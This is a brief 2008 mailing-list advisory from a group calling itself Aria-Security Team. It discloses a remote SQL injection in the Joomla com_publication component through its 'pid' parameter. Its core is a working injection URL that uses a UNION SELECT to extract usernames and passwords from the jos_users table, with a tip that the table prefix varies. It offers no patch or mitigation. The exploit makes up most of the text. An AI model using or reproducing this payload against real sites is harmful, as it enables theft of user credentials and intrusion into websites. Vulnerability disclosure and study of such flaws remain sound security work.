Aria-Security.Net: Joomla Com_publication "pid" Remote SQL Injection
Date: 23 Feb 2008 22:14:36 -0000
From: [email protected]
To: [email protected]
Subject: Aria-Security.Net: Joomla Com_publication "pid" Remote SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru
Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
-------------------------------
Shoutz: Aura, imm02tal, Kinglet, iM4n
Joomla Com_publication "pid" Remote SQL Injection
index.php?option=com_publication&task=view&pid=-9999999+union/**/select+0,username,password,0,0,0,0/**/from/**/jos_users/*
note: the prefix (jos_) maybe different for each website...
Regards,
The-0utl4w
Credits Goes to Aria-Security Team
